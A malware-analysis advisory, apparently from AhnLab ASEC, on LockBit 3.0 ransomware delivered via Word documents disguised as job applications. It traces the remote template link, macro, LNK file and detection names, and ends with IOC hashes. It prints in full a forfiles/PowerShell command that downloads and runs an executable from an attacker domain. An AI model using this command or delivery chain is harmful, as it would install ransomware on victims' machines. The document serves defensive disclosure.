LockBit 3.0 Ransomware Distributed via Word Documents

The ASEC analysis team has identified that LockBit 3.0 ransomware distributed while disguised as job application emails in NSIS format is also being distributed in Word document format. The specific distribution channel has not yet been identified, but considering that the distributed file names include names of people such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx’, it is likely that they were distributed disguised as job applications, similar to the past cases.

There is an external link in the word\_rels\settings.xml.rels file inside the Word document. When the document file is executed through this, the user PC accesses hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm and downloads an additional dotm file.

The document file contains an image that prompts the use of a macro script. The downloaded dlx5rc.dotm contains a VBA macro, and when the user clicks Enable Content, the malicious macro script is executed.

The VBA macro code inside the dotm file is as follows.

The strings in the code are obfuscated and use CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8). When the VBA macro is executed, it creates a file named skeml.lnk in the C:\Users\Public\ folder. The TargetPath of the link file is forfiles.exe, which is executed through rundll32.exe. The command that executes the link file is as follows.

• rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk

When the link file is executed, additional malicious files are downloaded from hxxp://ppaauuaa11232[.]cc/aaa.exe via PowerShell commands and then saved in C:\Users\Public\156498415616651651984561561658456.exe before being executed. The command executed via the LNK file is as follows.

• forfiles.exe /p c:\windows\system32 /m notepad.exe /c “”cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe”

The currently downloaded 156498415616651651984561561658456.exe file is LockBit 3.0 ransomware in NSIS form.

As LockBit ransomware is being distributed through various methods, user caution is advised. Users should update the applications and V3 they use to the latest version and refrain from opening document files from unknown sources.

[File Detection]
Downloader/DOC.External
Downloader/XML.External
Downloader/LNK.Powershell
Ransomware/Win.LockBit

[Behavior Detection]
Malware/MDP.Download.M1197  
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171

[IOC Info]
2d8b6275dee02ea4ed218ba2673b834e (docx)
97c07d03556ddcfc8ebfa462df546eb5 (docx)
45dfdde3df07b6ccc23b7ae6e3dc1212 (docx)
77c5fb080bf77f099c5b5f268dcf4435 (dotm)
738bee5280d512a238c3bb48c3278f63 (lnk)
7b74e4fb9a95f41d5d9b4a71a5fe40b9 (exe)
hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm
hxxp://ppaauuaa11232[.]cc/aaa.exe

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.